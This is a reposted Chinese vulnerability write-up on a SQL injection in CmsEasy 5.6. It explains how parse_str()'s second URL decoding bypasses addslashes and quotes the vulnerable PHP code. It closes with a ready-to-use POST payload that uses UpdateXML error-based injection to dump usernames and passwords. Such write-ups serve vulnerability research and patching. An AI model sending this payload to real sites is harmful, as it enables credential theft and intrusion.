cmseasy CmsEasy_5.6_20151009 無限制報錯注入(parse_str()的坑)
阿新 • • 發佈:2020-08-16
來源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.html
parse_str()引發的注入,
//parse_str()的作用是解析字串並且把字串註冊成變數,第二個引數$arr是一個數組,parse_str()之前會先urldecode,也就是會二次url解碼,實現單引號逃逸。
漏洞距離現在好像有點年代久遠,有個限制就是對於php的版本要小於5.4,因為5.4以後預設關閉gpc,如果關閉gpc就會呼叫addslashes().
1 2 3 4 5 6 7 8 |
function Postdata( $a ) {
global $db ;
$chatid = $_SESSION [ 'chatid' ];
$name = $_SESSION [ 'name' ];
$a [ 'detail' ] = htmlspecialchars( $a [ 'detail' ]);
if (!get_magic_quotes_gpc()) {
$a [ 'detail' ] = addslashes ( $a [ 'detail' ]);
}<br>}
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
if ( $rootTag == "xjxquery" ) {
$sQuery = "" ;
$this ->iPos++;
while (! stristr ( $this ->aObjArray[ $this ->iPos], "</xjxquery>" )) {
if ( stristr ( $this ->aObjArray[ $this ->iPos], "<q>" ) || stristr ( $this ->aObjArray[ $this ->iPos], "</q>" )) {
$this ->iPos++;
continue ;
}
$sQuery .= $this ->aObjArray[ $this ->iPos];
$this ->iPos++;
}
parse_str ( $sQuery , $aArray );
if ( $this ->bDecodeUTF8Input) {
foreach ( $aArray as $key => $value ) {
$aArray [ $key ] = $this ->_decodeUTF8Data( $value );
}
}
if (get_magic_quotes_gpc() == 1) {
$newArray = array ();
foreach ( $aArray as $sKey => $sValue ) {
if ( is_string ( $sValue ))
$newArray [ $sKey ] = stripslashes ( $sValue );
else
$newArray [ $sKey ] = $sValue ;
}
$aArray = $newArray ;
}
}
return $aArray ;
}
|
漏洞出現在parse_str($sQuery, $aArray);
所以能進行報錯注入
url: /celive/live/header.php
post:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>